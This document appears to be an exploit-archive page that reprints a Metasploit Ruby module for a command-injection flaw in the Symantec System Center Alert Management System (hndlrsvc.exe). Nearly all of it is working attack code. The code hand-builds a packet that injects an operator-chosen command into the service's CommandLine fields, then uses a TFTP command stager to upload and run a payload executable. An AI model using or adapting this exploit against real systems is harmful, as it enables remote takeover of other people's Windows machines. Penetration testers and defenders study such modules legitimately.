Symantec System Alert Management System (hndlrsvc.exe) Command Exec

2011-08-20T00:00:00
ID 1337DAY-ID-16732
Type zdt
Reporter metasploit
Modified 2011-08-20T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            ##
# $Id: ams_hndlrsvc.rb 13591 2011-08-19 18:35:29Z mc $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
    Rank = ExcellentRanking
 
    include Msf::Exploit::CmdStagerTFTP
    include Msf::Exploit::Remote::Tcp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
            'Description'    => %q{
                    Symantec System Center Alert Management System is prone to a
                remote command-injection vulnerability because the application fails
                to properly sanitize user-supplied input.
            },
            'Author'         => [ 'MC' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 13591 $',
            'References'     =>
                [
                    [ 'OSVDB', '66807'],
                    [ 'BID', '41959' ],
                    [ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ],
                ],
            'Targets'       =>
                [
                    [ 'Windows Universal',
                        {
                            'Arch' => ARCH_X86,
                            'Platform' => 'win'
                        }
                    ]
                ],
            'Privileged' => 'true',
            'Platform' => 'win',
            'DefaultTarget' => 0,
            'DisclosureDate' => 'Jul 26 2010'))
 
        register_options(
            [
                Opt::RPORT(38292),
                OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
            ], self.class)
    end
 
    def windows_stager
 
        exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
 
        print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
        execute_cmdstager({ :temp => '.'})
        @payload_exe = payload_exe
 
        print_status("Attempting to execute the payload...")
        execute_command(@payload_exe)
 
    end
 
    def execute_command(cmd, opts = {})
     
        connect
 
        if ( cmd.length > 128 )
            raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
        end
 
        string_uno  = Rex::Text.rand_text_alpha_upper(11)
        string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
 
        packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
        packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
        packet << "\xe8\x03\x00\x00"
        packet << 'PRGXCNFG'
        packet << "\x10\x00\x00\x00"
        packet << "\x00\x00\x00\x00\x04"
        packet << 'ALHD\F'
        packet << "\x00\x00\x01\x00\x00"
        packet << "\x00\x01\x00\x0e\x00"
        packet << 'Risk Repaired'
        packet << "\x00\x25\x00"
        packet << 'Symantec Antivirus Corporate Edition'
        packet << "\x00\xf9\x1d\x13\x4a\x3f"
        packet << [string_uno.length + 1].pack('v') + string_uno
        packet << "\x00\x08\x08\x0a"
        packet << "\x00" + 'Risk Name'
        packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
        packet << "\x00" + string_dos
        packet << "\x00\x08\x0a\x00"
        packet << 'File Path'
        packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
        packet << "\x00" + string_dos
        packet << "\x00\x08\x11\x00"
        packet << 'Requested Action'
        packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
        packet << "\x00" + string_dos
        packet << "\x00\x08\x0e\x00"
        packet << 'Actual Action'
        packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
        packet << "\x00" + string_dos
        packet << "\x00\x08\x07\x00"
        packet << 'Logger'
        packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
        packet << "\x00" + string_dos
        packet << "\x00\x08\x05\x00"
        packet << 'User'
        packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
        packet << "\x00" + string_dos
        packet << "\x00\x08\x09\x00"
        packet << 'Hostname'
        packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
        packet << "\x00\x08\x13\x00"
        packet << 'Corrective Actions'
        packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
        packet << "\x00" + string_dos
        packet << "\x00\x00\x07\x08\x12\x00"
        packet << 'ConfigurationName'
        packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
        packet << "\x00" + cmd
        packet << "\x00\x08\x0c\x00"
        packet << 'CommandLine'
        packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
        packet << "\x00" + cmd
        packet << "\x00\x08\x08\x00"
        packet << 'RunArgs'
        packet << "\x00\x04\x00\x02\x00"
        packet << "\x20\x00\x03\x05\x00"
        packet << 'Mode'
        packet << "\x00\x04\x00\x02\x00\x00\x00"
        packet << "\x0a\x0d\x00"
        packet << 'FormatString'
        packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
        packet << 'ConfigurationName'
        packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
        packet << 'HandlerHost'
        packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
        packet << "\x00" + string_dos
        packet << "\x00" * packet.length
 
        sock.put(packet)
     
        select(nil,nil,nil,3)  
        disconnect
    end
 
    def exploit
 
        if not datastore['CMD'].empty?
            print_status("Executing command '#{datastore['CMD']}'")
            execute_command(datastore['CMD'])
            return
        end
 
        case target['Platform']
            when 'win'
                windows_stager
            else
                raise RuntimeError, 'Target not supported.'
            end
 
        handler
 
    end
end



#  0day.today [2018-03-19]  #